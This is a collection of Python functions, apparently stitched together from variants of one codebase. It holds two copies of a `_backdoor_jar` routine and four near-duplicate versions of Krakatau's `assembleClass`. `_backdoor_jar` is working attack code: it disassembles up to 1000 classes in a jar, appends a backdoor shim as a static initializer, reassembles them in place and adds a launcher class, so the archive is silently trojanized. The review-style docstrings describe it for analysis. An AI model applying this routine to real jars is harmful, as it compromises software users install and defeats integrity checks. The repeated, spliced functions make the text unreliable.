def _backdoor_jar(self, jar_path):
    """Rewrite the jar at ``jar_path`` in place so selected classes carry the shim.

    What the code below does:

    * opens the archive in append mode and walks the entries already in it;
    * for up to 1000 ``.class`` entries whose name contains neither ``$`` nor
      ``_`` and whose disassembly has no static initializer, appends
      ``self.backdoor_shim`` to the Krakatau assembly text and reassembles it;
    * writes the reassembled class under the original entry name;
    * adds ``dilettante/Dilettante.class`` (``self.backdoor_launcher``) and
      ``dilettante/sad_cat.jpg`` (``self.image``).

    Review notes for anyone examining a jar that went through this routine:
    the two ``dilettante/`` entries use fixed names; because the archive is
    opened with mode "a", ``writestr`` on an existing name appends a second
    entry with that name instead of replacing the first; and the file's
    bytes change, so it no longer matches a checksum recorded for the
    original artifact (presumably a jar signature would fail to verify as
    well -- confirm against the jar in question).
    """
    zp = zipfile.ZipFile(jar_path, "a")
    count = 0
    for zinfo in zp.infolist():
        filename = zinfo.filename
        # Candidate filter: .class entries whose name has no "$" (skips inner
        # classes) and no "_".
        # NOTE(review): the original comment said "first 100 classes", but the
        # condition below caps the number of rewritten classes at 1000.
        # TODO: come up with a better way to speed this up
        if count < 1000 and str.endswith(filename, ".class") and "$" not in filename and "_" not in filename:
            data = zp.read(zinfo)
            # disassemble class with Krakatau
            stream = Krakatau.binUnpacker.binUnpacker(data=data)
            class_ = ClassFile(stream)
            class_.loadElements(keepRaw=True)
            source = Krakatau.assembler.disassembler.disassemble(class_)
            # Classes that already declare a static initializer (<clinit>) are
            # left untouched; only the two spellings below are recognised.
            if ".method static <clinit> : ()V" not in source and ".method static public <clinit> : ()V" not in source:
                count += 1
                # Append the shim text to the disassembly and assemble again.
                backdoored_source = "\n" + source + self.backdoor_shim
                lexer = tokenize.makeLexer(debug=False)
                parser = parse.makeParser(debug=False)
                parse_trees = parser.parse(backdoored_source, lexer=lexer)
                # Only the first parse tree is assembled; element [1] of the
                # result is taken -- presumably the class bytes, confirm
                # against assembler.assemble.
                backdoored_class = assembler.assemble(parse_trees[0], False, False, filename)[1]
                # Written under the same entry name (see the docstring note
                # on duplicate entries in append mode).
                logging.debug("backdooring class" + filename)
                zp.writestr(filename, backdoored_class)
    # Fixed-name entries added to every processed jar.
    zp.writestr("dilettante/Dilettante.class", self.backdoor_launcher)
    zp.writestr("dilettante/sad_cat.jpg", self.image)
    zp.close()
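def assembleClass(filename, makeLineNumbers, jasmode, debug=0):
    """Parse the assembly file *filename* and assemble it.

    Args:
        filename: Path of the assembly source file. Its basename is passed
            to the assembler as the fourth argument.
        makeLineNumbers: Forwarded unchanged to ``assembler.assemble``.
        jasmode: Forwarded unchanged to ``assembler.assemble``.
        debug: Debug setting handed to both the lexer and the parser factory.

    Returns:
        Whatever ``assembler.assemble`` returns for the parse result.
    """
    # Read through a context manager so the handle is closed even when
    # read() raises, instead of relying on garbage collection.
    with open(filename, 'rb') as source_file:
        assembly = source_file.read()

    lexer = tokenize.makeLexer(debug=debug)
    parser = parse.makeParser(debug=debug)
    # The text is wrapped in newlines before it is handed to the parser.
    parse_tree = parser.parse('\n' + assembly + '\n', lexer=lexer)
    return assembler.assemble(parse_tree, makeLineNumbers, jasmode,
                              os.path.basename(filename))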
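def assembleClass(filename, makeLineNumbers, jasmode, debug=0):
    """Assemble every class parsed from the assembly file *filename*.

    Args:
        filename: Path of the assembly source file. Its basename is passed
            to the assembler as the fourth argument.
        makeLineNumbers: Forwarded unchanged to ``assembler.assemble``.
        jasmode: Forwarded unchanged to ``assembler.assemble``.
        debug: Debug setting handed to both the lexer and the parser factory.

    Returns:
        The parser's own result when it is falsy (for example ``None`` or an
        empty list); otherwise a list holding one ``assembler.assemble``
        result per parse tree.
    """
    basename = os.path.basename(filename)
    # Read through a context manager so the handle is closed even when
    # read() raises, instead of relying on garbage collection.
    with open(filename, 'rb') as source_file:
        assembly = source_file.read()
    assembly = '\n' + assembly + '\n'  # parser expects newlines at beginning and end

    lexer = tokenize.makeLexer(debug=debug)
    parser = parse.makeParser(debug=debug)
    parse_trees = parser.parse(assembly, lexer=lexer)
    # `and` keeps the falsy parser result as the return value.
    return parse_trees and [
        assembler.assemble(tree, makeLineNumbers, jasmode, basename)
        for tree in parse_trees
    ]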
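def assembleClass(filename, makeLineNumbers, jasmode, debug=0):
    """Read an assembly file and assemble each class the parser finds in it.

    Args:
        filename: Path of the assembly source file; only its basename is
            given to the assembler.
        makeLineNumbers: Passed through to ``assembler.assemble``.
        jasmode: Passed through to ``assembler.assemble``.
        debug: Debug setting used for both ``tokenize.makeLexer`` and
            ``parse.makeParser``.

    Returns:
        The falsy parser result as-is when parsing yields nothing, else a
        list with one ``assembler.assemble`` result per parse tree.
    """
    basename = os.path.basename(filename)
    # `with` guarantees the file handle is released on every path.
    with open(filename, 'rb') as handle:
        assembly = handle.read()
    assembly = '\n' + assembly + '\n'  # parser expects newlines at beginning and end

    lexer = tokenize.makeLexer(debug=debug)
    parser = parse.makeParser(debug=debug)
    parse_trees = parser.parse(assembly, lexer=lexer)
    # Short-circuit: a falsy parse result is returned unchanged.
    return parse_trees and [
        assembler.assemble(tree, makeLineNumbers, jasmode, basename)
        for tree in parse_trees
    ]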
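def assembleClass(filename, makeLineNumbers, jasmode, debug=0):
    """Assemble every class parsed from the assembly file *filename*.

    Input that begins like a class file or a zip/jar archive is rejected
    with a message on stdout before any parsing takes place.

    Args:
        filename: Path of the assembly source file. Its basename is passed
            to the assembler as the fourth argument.
        makeLineNumbers: Forwarded unchanged to ``assembler.assemble``.
        jasmode: Forwarded unchanged to ``assembler.assemble``.
        debug: Debug setting handed to both the lexer and the parser factory.

    Returns:
        ``[]`` when the input looks like a binary; the parser's own result
        when it is falsy; otherwise a list holding one
        ``assembler.assemble`` result per parse tree.
    """
    basename = os.path.basename(filename)
    # Read through a context manager so the handle is closed even when
    # read() raises, instead of relying on garbage collection.
    with open(filename, 'rb') as source_file:
        assembly = source_file.read()

    # '\xca\xfe' is the start of the class-file magic number (0xCAFEBABE) and
    # 'PK\x03\x04' is the zip local-file-header signature.
    if assembly.startswith(('\xca\xfe', '\x50\x4b\x03\x04')):
        print 'Error: You appear to have passed a jar or classfile instead of an assembly file'
        print 'Perhaps you meant to invoke the disassembler instead?'
        return []

    assembly = '\n' + assembly + '\n'  # parser expects newlines at beginning and end
    lexer = tokenize.makeLexer(debug=debug)
    parser = parse.makeParser(debug=debug)
    parse_trees = parser.parse(assembly, lexer=lexer)
    # `and` keeps the falsy parser result as the return value.
    return parse_trees and [
        assembler.assemble(tree, makeLineNumbers, jasmode, basename)
        for tree in parse_trees
    ]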
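def assembleClass(filename, makeLineNumbers, jasmode, debug=0):
    """Read an assembly file and assemble each class the parser finds in it.

    A file whose first bytes match a class file or a zip/jar archive is
    refused: two lines are printed to stdout and nothing is parsed.

    Args:
        filename: Path of the assembly source file; only its basename is
            given to the assembler.
        makeLineNumbers: Passed through to ``assembler.assemble``.
        jasmode: Passed through to ``assembler.assemble``.
        debug: Debug setting used for both ``tokenize.makeLexer`` and
            ``parse.makeParser``.

    Returns:
        ``[]`` for binary-looking input; the falsy parser result as-is when
        parsing yields nothing; else a list with one
        ``assembler.assemble`` result per parse tree.
    """
    basename = os.path.basename(filename)
    # `with` guarantees the file handle is released on every path.
    with open(filename, 'rb') as handle:
        assembly = handle.read()

    # Leading bytes checked: '\xca\xfe' (first half of the 0xCAFEBABE class
    # magic) and 'PK\x03\x04' (zip local-file-header signature).
    binary_prefixes = ('\xca\xfe', '\x50\x4b\x03\x04')
    if assembly.startswith(binary_prefixes):
        print 'Error: You appear to have passed a jar or classfile instead of an assembly file'
        print 'Perhaps you meant to invoke the disassembler instead?'
        return []

    assembly = '\n' + assembly + '\n'  # parser expects newlines at beginning and end
    lexer = tokenize.makeLexer(debug=debug)
    parser = parse.makeParser(debug=debug)
    parse_trees = parser.parse(assembly, lexer=lexer)
    # Short-circuit: a falsy parse result is returned unchanged.
    return parse_trees and [
        assembler.assemble(tree, makeLineNumbers, jasmode, basename)
        for tree in parse_trees
    ]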
def _backdoor_jar(self, jar_path):
    """Modify the jar at ``jar_path`` in place, adding the shim to its classes.

    Behaviour visible in the body:

    * the archive is opened in append mode and its existing entries walked;
    * at most 1000 entries are rewritten -- those ending in ``.class`` whose
      name has no ``$`` and no ``_`` and whose disassembly shows no static
      initializer; each is disassembled with Krakatau, has
      ``self.backdoor_shim`` appended to the assembly text, and is
      reassembled and written under its original name;
    * ``dilettante/Dilettante.class`` (``self.backdoor_launcher``) and
      ``dilettante/sad_cat.jpg`` (``self.image``) are added afterwards.

    Review notes for analysis of a jar produced by this routine: the two
    ``dilettante/`` entry names are fixed; mode "a" means ``writestr`` on an
    existing name appends a duplicate entry rather than replacing the
    original; the archive's bytes change, so a checksum recorded for the
    original artifact no longer matches (a jar signature would presumably
    fail to verify too -- confirm against the jar in question).
    """
    zp = zipfile.ZipFile(jar_path, "a")
    count = 0
    for zinfo in zp.infolist():
        filename = zinfo.filename
        # Candidate filter: .class entries whose name has no "$" (skips inner
        # classes) and no "_".
        # NOTE(review): the original comment said "first 100 classes", but the
        # condition below caps the number of rewritten classes at 1000.
        # TODO: come up with a better way to speed this up
        if count < 1000 and str.endswith(
                filename, ".class") and "$" not in filename and "_" not in filename:
            data = zp.read(zinfo)
            # disassemble class with Krakatau
            stream = Krakatau.binUnpacker.binUnpacker(data=data)
            class_ = ClassFile(stream)
            class_.loadElements(keepRaw=True)
            source = Krakatau.assembler.disassembler.disassemble(class_)
            # Classes that already declare a static initializer (<clinit>) are
            # left untouched; only the two spellings below are recognised.
            if ".method static <clinit> : ()V" not in source and ".method static public <clinit> : ()V" not in source:
                count += 1
                # Append the shim text to the disassembly and assemble again.
                backdoored_source = "\n" + source + self.backdoor_shim
                lexer = tokenize.makeLexer(debug=False)
                parser = parse.makeParser(debug=False)
                parse_trees = parser.parse(backdoored_source, lexer=lexer)
                # Only the first parse tree is assembled; element [1] of the
                # result is taken -- presumably the class bytes, confirm
                # against assembler.assemble.
                backdoored_class = assembler.assemble(
                    parse_trees[0], False, False, filename)[1]
                # Written under the same entry name (see the docstring note
                # on duplicate entries in append mode).
                logging.debug("backdooring class" + filename)
                zp.writestr(filename, backdoored_class)
    # Fixed-name entries added to every processed jar.
    zp.writestr("dilettante/Dilettante.class", self.backdoor_launcher)
    zp.writestr("dilettante/sad_cat.jpg", self.image)
    zp.close()